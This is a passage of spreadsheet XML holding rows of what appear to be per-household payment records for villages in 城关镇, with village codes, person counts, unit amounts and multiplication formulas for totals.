      <c r="K479" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="480" ht="23" customHeight="1" spans="1:11">
      <c r="A480" s="13" t="s">
        <v>1373</v>
      </c>
      <c r="B480" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C480" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D480" s="14" t="s">
        <v>1374</v>
      </c>
      <c r="E480" s="14" t="s">
        <v>1375</v>
      </c>
      <c r="F480" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G480" s="14">
        <v>1</v>
      </c>
      <c r="H480" s="14">
        <v>340</v>
      </c>
      <c r="I480" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J480" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K480" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="481" ht="23" customHeight="1" spans="1:11">
      <c r="A481" s="13" t="s">
        <v>1376</v>
      </c>
      <c r="B481" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C481" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D481" s="14" t="s">
        <v>1377</v>
      </c>
      <c r="E481" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F481" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G481" s="14">
        <v>1</v>
      </c>
      <c r="H481" s="14">
        <v>340</v>
      </c>
      <c r="I481" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J481" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K481" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="482" ht="23" customHeight="1" spans="1:11">
      <c r="A482" s="13" t="s">
        <v>1378</v>
      </c>
      <c r="B482" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C482" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D482" s="14" t="s">
        <v>1379</v>
      </c>
      <c r="E482" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F482" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G482" s="14">
        <v>1</v>
      </c>
      <c r="H482" s="14">
        <v>340</v>
      </c>
      <c r="I482" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J482" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K482" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="483" ht="23" customHeight="1" spans="1:11">
      <c r="A483" s="13" t="s">
        <v>1380</v>
      </c>
      <c r="B483" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C483" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D483" s="14" t="s">
        <v>1381</v>
      </c>
      <c r="E483" s="14" t="s">
        <v>1382</v>
      </c>
      <c r="F483" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G483" s="14">
        <v>1</v>
      </c>
      <c r="H483" s="14">
        <v>340</v>
      </c>
      <c r="I483" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J483" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K483" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="484" ht="23" customHeight="1" spans="1:11">
      <c r="A484" s="13" t="s">
        <v>1383</v>
      </c>
      <c r="B484" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C484" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D484" s="14" t="s">
        <v>1384</v>
      </c>
      <c r="E484" s="14" t="s">
        <v>236</v>
      </c>
      <c r="F484" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G484" s="14">
        <v>1</v>
      </c>
      <c r="H484" s="14">
        <v>340</v>
      </c>
      <c r="I484" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J484" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K484" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="485" ht="23" customHeight="1" spans="1:11">
      <c r="A485" s="13" t="s">
        <v>1385</v>
      </c>
      <c r="B485" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C485" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D485" s="14" t="s">
        <v>1386</v>
      </c>
      <c r="E485" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F485" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G485" s="14">
        <v>1</v>
      </c>
      <c r="H485" s="14">
        <v>340</v>
      </c>
      <c r="I485" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J485" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K485" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="486" ht="23" customHeight="1" spans="1:11">
      <c r="A486" s="13" t="s">
        <v>1387</v>
      </c>
      <c r="B486" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C486" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D486" s="14" t="s">
        <v>1388</v>
      </c>
      <c r="E486" s="14" t="s">
        <v>252</v>
      </c>
      <c r="F486" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G486" s="14">
        <v>1</v>
      </c>
      <c r="H486" s="14">
        <v>340</v>
      </c>
      <c r="I486" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J486" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K486" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="487" ht="23" customHeight="1" spans="1:11">
      <c r="A487" s="13" t="s">
        <v>1389</v>
      </c>
      <c r="B487" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C487" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D487" s="14" t="s">
        <v>1390</v>
      </c>
      <c r="E487" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F487" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G487" s="14">
        <v>1</v>
      </c>
      <c r="H487" s="14">
        <v>340</v>
      </c>
      <c r="I487" s="14">
        <f t="shared" si="19"/>
        <v>340</v>
      </c>
      <c r="J487" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K487" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="488" ht="23" customHeight="1" spans="1:11">
      <c r="A488" s="13" t="s">
        <v>1391</v>
      </c>
      <c r="B488" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C488" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D488" s="14" t="s">
        <v>1392</v>
      </c>
      <c r="E488" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F488" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G488" s="14">
        <v>2</v>
      </c>
      <c r="H488" s="14">
        <v>300</v>
      </c>
      <c r="I488" s="14">
        <f t="shared" si="19"/>
        <v>600</v>
      </c>
      <c r="J488" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K488" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="489" ht="23" customHeight="1" spans="1:11">
      <c r="A489" s="13" t="s">
        <v>1393</v>
      </c>
      <c r="B489" s="14" t="str">
        <f>B488</f>
        <v>城关镇</v>
      </c>
      <c r="C489" s="14" t="str">
        <f>C488</f>
        <v>东北村</v>
      </c>
      <c r="D489" s="13" t="s">
        <v>1394</v>
      </c>
      <c r="E489" s="13" t="s">
        <v>295</v>
      </c>
      <c r="F489" s="14" t="str">
        <f>F488</f>
        <v>4113210103</v>
      </c>
      <c r="G489" s="14"/>
      <c r="H489" s="14"/>
      <c r="I489" s="14"/>
      <c r="J489" s="14"/>
      <c r="K489" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="490" ht="23" customHeight="1" spans="1:11">
      <c r="A490" s="13" t="s">
        <v>1395</v>
      </c>
      <c r="B490" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C490" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D490" s="14" t="s">
        <v>1396</v>
      </c>
      <c r="E490" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F490" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G490" s="14">
        <v>1</v>
      </c>
      <c r="H490" s="14">
        <v>340</v>
      </c>
      <c r="I490" s="14">
        <f>H490*G490</f>
        <v>340</v>
      </c>
      <c r="J490" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K490" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="491" ht="23" customHeight="1" spans="1:11">
      <c r="A491" s="13" t="s">
        <v>1397</v>
      </c>
      <c r="B491" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C491" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D491" s="14" t="s">
        <v>1398</v>
      </c>
      <c r="E491" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F491" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G491" s="14">
        <v>2</v>
      </c>
      <c r="H491" s="14">
        <v>300</v>
      </c>
      <c r="I491" s="14">
        <f>H491*G491</f>
        <v>600</v>
      </c>
      <c r="J491" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K491" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="492" ht="23" customHeight="1" spans="1:11">
      <c r="A492" s="13" t="s">
        <v>1399</v>
      </c>
      <c r="B492" s="14" t="str">
        <f>B491</f>
        <v>城关镇</v>
      </c>
      <c r="C492" s="14" t="str">
        <f>C491</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D492" s="13" t="s">
        <v>1400</v>
      </c>
      <c r="E492" s="13" t="s">
        <v>435</v>
      </c>
      <c r="F492" s="14" t="str">
        <f>F491</f>
        <v>4113210106</v>
      </c>
      <c r="G492" s="14"/>
      <c r="H492" s="14"/>
      <c r="I492" s="14"/>
      <c r="J492" s="14"/>
      <c r="K492" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="493" ht="23" customHeight="1" spans="1:11">
      <c r="A493" s="13" t="s">
        <v>1401</v>
      </c>
      <c r="B493" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C493" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D493" s="14" t="s">
        <v>1402</v>
      </c>
      <c r="E493" s="14" t="s">
        <v>1403</v>
      </c>
      <c r="F493" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G493" s="14">
        <v>1</v>
      </c>
      <c r="H493" s="14">
        <v>340</v>
      </c>
      <c r="I493" s="14">
        <f>H493*G493</f>
        <v>340</v>
      </c>
      <c r="J493" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K493" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="494" ht="23" customHeight="1" spans="1:11">
      <c r="A494" s="13" t="s">
        <v>1404</v>
      </c>
      <c r="B494" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C494" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D494" s="14" t="s">
        <v>1405</v>
      </c>
      <c r="E494" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F494" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G494" s="14">
        <v>1</v>
      </c>
      <c r="H494" s="14">
        <v>340</v>
      </c>
      <c r="I494" s="14">
        <f>H494*G494</f>
        <v>340</v>
      </c>
      <c r="J494" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K494" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="495" ht="23" customHeight="1" spans="1:11">
      <c r="A495" s="13" t="s">
        <v>1406</v>
      </c>
      <c r="B495" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C495" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D495" s="14" t="s">
        <v>1407</v>
      </c>
      <c r="E495" s="14" t="s">
        <v>502</v>
      </c>
      <c r="F495" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G495" s="14">
        <v>1</v>
      </c>
      <c r="H495" s="14">
        <v>340</v>
      </c>
      <c r="I495" s="14">
        <f>H495*G495</f>
        <v>340</v>
      </c>
      <c r="J495" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K495" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="496" ht="23" customHeight="1" spans="1:11">
      <c r="A496" s="13" t="s">
        <v>1408</v>
      </c>
      <c r="B496" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C496" s="14" t="s">
        <v>219</v>
      </c>
      <c r="D496" s="14" t="s">
        <v>1409</v>
      </c>
      <c r="E496" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F496" s="14" t="s">
        <v>1231</v>
      </c>
      <c r="G496" s="14">
        <v>1</v>
      </c>
      <c r="H496" s="14">
        <v>340</v>
      </c>
      <c r="I496" s="14">
        <f>H496*G496</f>
        <v>340</v>
      </c>
      <c r="J496" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K496" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="497" ht="23" customHeight="1" spans="1:11">
      <c r="A497" s="13" t="s">
        <v>1410</v>
      </c>
      <c r="B497" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C497" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D497" s="14" t="s">
        <v>1411</v>
      </c>
      <c r="E497" s="14" t="s">
        <v>1009</v>
      </c>
      <c r="F497" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G497" s="14">
        <v>2</v>
      </c>
      <c r="H497" s="14">
        <v>300</v>
      </c>
      <c r="I497" s="14">
        <f>H497*G497</f>
        <v>600</v>
      </c>
      <c r="J497" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K497" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="498" ht="23" customHeight="1" spans="1:11">
      <c r="A498" s="13" t="s">
        <v>1412</v>
      </c>
      <c r="B498" s="14" t="str">
        <f>B497</f>
        <v>城关镇</v>
      </c>
      <c r="C498" s="14" t="str">
        <f>C497</f>
        <v>北外村</v>
      </c>
      <c r="D498" s="13" t="s">
        <v>1413</v>
      </c>
      <c r="E498" s="13" t="s">
        <v>1414</v>
      </c>
      <c r="F498" s="14" t="str">
        <f>F497</f>
        <v>4113210102</v>
      </c>
      <c r="G498" s="14"/>
      <c r="H498" s="14"/>
      <c r="I498" s="14"/>
      <c r="J498" s="14"/>
      <c r="K498" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="499" ht="23" customHeight="1" spans="1:11">
      <c r="A499" s="13" t="s">
        <v>1415</v>
      </c>
      <c r="B499" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C499" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D499" s="14" t="s">
        <v>1416</v>
      </c>
      <c r="E499" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F499" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G499" s="14">
        <v>2</v>
      </c>
      <c r="H499" s="14">
        <v>300</v>
      </c>
      <c r="I499" s="14">
        <f>H499*G499</f>
        <v>600</v>
      </c>
      <c r="J499" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K499" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="500" ht="23" customHeight="1" spans="1:11">
      <c r="A500" s="13" t="s">
        <v>1417</v>
      </c>
      <c r="B500" s="14" t="str">
        <f>B499</f>
        <v>城关镇</v>
      </c>
      <c r="C500" s="14" t="str">
        <f>C499</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D500" s="13" t="s">
        <v>1418</v>
      </c>
      <c r="E500" s="13" t="s">
        <v>527</v>
      </c>
      <c r="F500" s="14" t="str">
        <f>F499</f>
        <v>4113210103</v>
      </c>
      <c r="G500" s="14"/>
      <c r="H500" s="14"/>
      <c r="I500" s="14"/>
      <c r="J500" s="14"/>
      <c r="K500" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="501" ht="23" customHeight="1" spans="1:11">
      <c r="A501" s="13" t="s">
        <v>1419</v>
      </c>
      <c r="B501" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C501" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D501" s="14" t="s">
        <v>1420</v>
      </c>
      <c r="E501" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F501" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G501" s="14">
        <v>1</v>
      </c>
      <c r="H501" s="14">
        <v>340</v>
      </c>
      <c r="I501" s="14">
        <f>H501*G501</f>
        <v>340</v>
      </c>
      <c r="J501" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K501" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="502" ht="23" customHeight="1" spans="1:11">
      <c r="A502" s="13" t="s">
        <v>1421</v>
      </c>
      <c r="B502" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C502" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D502" s="14" t="s">
        <v>1422</v>
      </c>
      <c r="E502" s="14" t="s">
        <v>551</v>
      </c>
      <c r="F502" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G502" s="14">
        <v>1</v>
      </c>
      <c r="H502" s="14">
        <v>340</v>
      </c>
      <c r="I502" s="14">
        <f>H502*G502</f>
        <v>340</v>
      </c>
      <c r="J502" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K502" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="503" ht="23" customHeight="1" spans="1:11">
      <c r="A503" s="13" t="s">
        <v>1423</v>
      </c>
      <c r="B503" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C503" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D503" s="14" t="s">
        <v>1424</v>
      </c>
      <c r="E503" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F503" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G503" s="14">
        <v>1</v>
      </c>
      <c r="H503" s="14">
        <v>340</v>
      </c>
      <c r="I503" s="14">
        <f>H503*G503</f>
        <v>340</v>
      </c>
      <c r="J503" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K503" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="504" ht="23" customHeight="1" spans="1:11">
      <c r="A504" s="13" t="s">
        <v>1425</v>
      </c>
      <c r="B504" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C504" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D504" s="14" t="s">
        <v>1426</v>
      </c>
      <c r="E504" s="14" t="s">
        <v>1427</v>
      </c>
      <c r="F504" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G504" s="14">
        <v>1</v>
      </c>
      <c r="H504" s="14">
        <v>340</v>
      </c>
      <c r="I504" s="14">
        <f>H504*G504</f>
        <v>340</v>
      </c>
      <c r="J504" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K504" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="505" ht="23" customHeight="1" spans="1:11">
      <c r="A505" s="13" t="s">
        <v>1428</v>
      </c>
      <c r="B505" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C505" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D505" s="14" t="s">
        <v>1429</v>
      </c>
      <c r="E505" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F505" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G505" s="14">
        <v>2</v>
      </c>
      <c r="H505" s="14">
        <v>300</v>
      </c>
      <c r="I505" s="14">
        <f>H505*G505</f>
        <v>600</v>
      </c>
      <c r="J505" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K505" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="506" ht="23" customHeight="1" spans="1:11">
      <c r="A506" s="13" t="s">
        <v>1430</v>
      </c>
      <c r="B506" s="14" t="str">
        <f>B505</f>
        <v>城关镇</v>
      </c>
      <c r="C506" s="14" t="str">
        <f>C505</f>
        <v>城关镇北外村</v>
      </c>
      <c r="D506" s="13" t="s">
        <v>1431</v>
      </c>
      <c r="E506" s="13" t="s">
        <v>222</v>
      </c>
      <c r="F506" s="14" t="str">
        <f>F505</f>
        <v>4113210102</v>
      </c>
      <c r="G506" s="14"/>
      <c r="H506" s="14"/>
      <c r="I506" s="14"/>
      <c r="J506" s="14"/>
      <c r="K506" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="507" ht="23" customHeight="1" spans="1:11">
      <c r="A507" s="13" t="s">
        <v>1432</v>
      </c>
      <c r="B507" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C507" s="14" t="s">
        <v>1433</v>
      </c>
      <c r="D507" s="14" t="s">
        <v>1434</v>
      </c>
      <c r="E507" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F507" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G507" s="14">
        <v>1</v>
      </c>
      <c r="H507" s="14">
        <v>340</v>
      </c>
      <c r="I507" s="14">
        <f t="shared" ref="I507:I513" si="20">H507*G507</f>
        <v>340</v>
      </c>
      <c r="J507" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K507" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="508" ht="23" customHeight="1" spans="1:11">
      <c r="A508" s="13" t="s">
        <v>1435</v>
      </c>
      <c r="B508" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C508" s="14" t="s">
        <v>1433</v>
      </c>
      <c r="D508" s="14" t="s">
        <v>1436</v>
      </c>
      <c r="E508" s="14" t="s">
        <v>1437</v>
      </c>
      <c r="F508" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G508" s="14">
        <v>1</v>
      </c>
      <c r="H508" s="14">
        <v>340</v>
      </c>
      <c r="I508" s="14">
        <f t="shared" si="20"/>
        <v>340</v>
      </c>
      <c r="J508" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K508" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="509" ht="23" customHeight="1" spans="1:11">
      <c r="A509" s="13" t="s">
        <v>1438</v>
      </c>
      <c r="B509" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C509" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D509" s="14" t="s">
        <v>1439</v>
      </c>
      <c r="E509" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F509" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G509" s="14">
        <v>1</v>
      </c>
      <c r="H509" s="14">
        <v>340</v>
      </c>
      <c r="I509" s="14">
        <f t="shared" si="20"/>
        <v>340</v>
      </c>
      <c r="J509" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K509" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="510" ht="23" customHeight="1" spans="1:11">
      <c r="A510" s="13" t="s">
        <v>1440</v>
      </c>
      <c r="B510" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C510" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D510" s="14" t="s">
        <v>1441</v>
      </c>
      <c r="E510" s="14" t="s">
        <v>1442</v>
      </c>
      <c r="F510" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G510" s="14">
        <v>1</v>
      </c>
      <c r="H510" s="14">
        <v>340</v>
      </c>
      <c r="I510" s="14">
        <f t="shared" si="20"/>
        <v>340</v>
      </c>
      <c r="J510" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K510" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="511" ht="23" customHeight="1" spans="1:11">
      <c r="A511" s="13" t="s">
        <v>1443</v>
      </c>
      <c r="B511" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C511" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D511" s="14" t="s">
        <v>1444</v>
      </c>
      <c r="E511" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F511" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G511" s="14">
        <v>1</v>
      </c>
      <c r="H511" s="14">
        <v>340</v>
      </c>
      <c r="I511" s="14">
        <f t="shared" si="20"/>
        <v>340</v>
      </c>
      <c r="J511" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K511" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="512" ht="23" customHeight="1" spans="1:11">
      <c r="A512" s="13" t="s">
        <v>1445</v>
      </c>
      <c r="B512" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C512" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D512" s="14" t="s">
        <v>1446</v>
      </c>
      <c r="E512" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F512" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G512" s="14">
        <v>1</v>
      </c>
      <c r="H512" s="14">
        <v>340</v>
      </c>
      <c r="I512" s="14">
        <f t="shared" si="20"/>
        <v>340</v>
      </c>
      <c r="J512" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K512" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="513" ht="23" customHeight="1" spans="1:11">
      <c r="A513" s="13" t="s">
        <v>1447</v>
      </c>
      <c r="B513" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C513" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D513" s="14" t="s">
        <v>1448</v>
      </c>
      <c r="E513" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F513" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G513" s="14">
        <v>2</v>
      </c>
      <c r="H513" s="14">
        <v>300</v>
      </c>
      <c r="I513" s="14">
        <f t="shared" si="20"/>
        <v>600</v>
      </c>
      <c r="J513" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K513" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="514" ht="23" customHeight="1" spans="1:11">
      <c r="A514" s="13" t="s">
        <v>1449</v>
      </c>
      <c r="B514" s="14" t="str">
        <f>B513</f>
        <v>城关镇</v>
      </c>
      <c r="C514" s="14" t="str">
        <f>C513</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D514" s="13" t="s">
        <v>1450</v>
      </c>
      <c r="E514" s="13" t="s">
        <v>484</v>
      </c>
      <c r="F514" s="14" t="str">
        <f>F513</f>
        <v>4113210108</v>
      </c>
      <c r="G514" s="14"/>
      <c r="H514" s="14"/>
      <c r="I514" s="14"/>
      <c r="J514" s="14"/>
      <c r="K514" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="515" ht="23" customHeight="1" spans="1:11">
      <c r="A515" s="13" t="s">
        <v>1451</v>
      </c>
      <c r="B515" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C515" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D515" s="14" t="s">
        <v>1452</v>
      </c>
      <c r="E515" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F515" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G515" s="14">
        <v>1</v>
      </c>
      <c r="H515" s="14">
        <v>340</v>
      </c>
      <c r="I515" s="14">
        <f t="shared" ref="I515:I530" si="21">H515*G515</f>
        <v>340</v>
      </c>
      <c r="J515" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K515" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="516" ht="23" customHeight="1" spans="1:11">
      <c r="A516" s="13" t="s">
        <v>1453</v>
      </c>
      <c r="B516" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C516" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D516" s="14" t="s">
        <v>1454</v>
      </c>
      <c r="E516" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F516" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G516" s="14">
        <v>1</v>
      </c>
      <c r="H516" s="14">
        <v>340</v>
      </c>
      <c r="I516" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J516" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K516" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="517" ht="23" customHeight="1" spans="1:11">
      <c r="A517" s="13" t="s">
        <v>1455</v>
      </c>
      <c r="B517" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C517" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D517" s="14" t="s">
        <v>1456</v>
      </c>
      <c r="E517" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F517" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G517" s="14">
        <v>1</v>
      </c>
      <c r="H517" s="14">
        <v>340</v>
      </c>
      <c r="I517" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J517" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K517" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="518" ht="23" customHeight="1" spans="1:11">
      <c r="A518" s="13" t="s">
        <v>1457</v>
      </c>
      <c r="B518" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C518" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D518" s="14" t="s">
        <v>1458</v>
      </c>
      <c r="E518" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F518" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G518" s="14">
        <v>1</v>
      </c>
      <c r="H518" s="14">
        <v>340</v>
      </c>
      <c r="I518" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J518" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K518" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="519" ht="23" customHeight="1" spans="1:11">
      <c r="A519" s="13" t="s">
        <v>1459</v>
      </c>
      <c r="B519" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C519" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D519" s="14" t="s">
        <v>1460</v>
      </c>
      <c r="E519" s="14" t="s">
        <v>258</v>
      </c>
      <c r="F519" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G519" s="14">
        <v>1</v>
      </c>
      <c r="H519" s="14">
        <v>340</v>
      </c>
      <c r="I519" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J519" s="14" t="s">
        <v>224</v>
      </c>
